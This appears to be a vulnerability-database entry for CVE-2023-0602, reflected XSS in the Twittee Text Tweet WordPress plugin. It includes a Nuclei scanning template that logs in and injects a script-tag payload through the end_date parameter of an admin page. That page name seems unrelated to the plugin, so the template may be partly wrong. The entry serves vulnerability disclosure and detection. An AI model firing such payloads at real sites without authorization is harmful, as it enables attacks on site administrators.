CVE-2023-0602: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Twittee Text Tweet | POC: 已公开

漏洞描述

The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.

PoC代码[已公开]

id: CVE-2023-0602

info:
  name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.
  reference:
    - https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0602
    - https://wordpress.org/plugins/twittee-text-tweet/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0602
    cwe-id: CWE-79
    epss-score: 0.0565
    epss-percentile: 0.90026
    cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: johnniejodelljr
    product: twittee_text_tweet
    framework: wordpress
  tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains_all(body_2, "<script>alert(document.domain)</script>", "twittee")'
        condition: and
# digest: 490a00463044022003d4942a5a06df17a0deccd53828ab6a4e8c62fbb640c11ca698af3fda508c8002202d61d26b36c60eb4141cb21435a9230e212cdf85d03a75f75cedc469a34dd727:922c64590222798bb761d5b6d8e72950

相关漏洞推荐